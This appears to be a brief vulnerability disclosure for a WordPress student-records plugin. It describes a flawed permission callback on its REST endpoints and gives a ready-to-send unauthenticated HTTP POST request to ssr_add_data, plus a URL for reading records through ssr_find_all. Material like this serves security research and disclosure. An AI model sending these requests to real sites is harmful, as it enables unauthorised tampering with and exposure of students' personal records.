The plugin has a flawed permission callback in its REST endpoints, allowing unauthenticated attackers to call them and add/edit/delete arbitrary student for example
POST /wp-json/v2/ssr_add_data HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 104
Connection: close
rid=Test&roll=&stdname=&fathersname=&pyear=&cgpa=&subject=&dob=&gender=&address=&mnam=&c1=&c2=&image=
http://example.com/wp-json/v2/ssr_find_all?postID=<RID>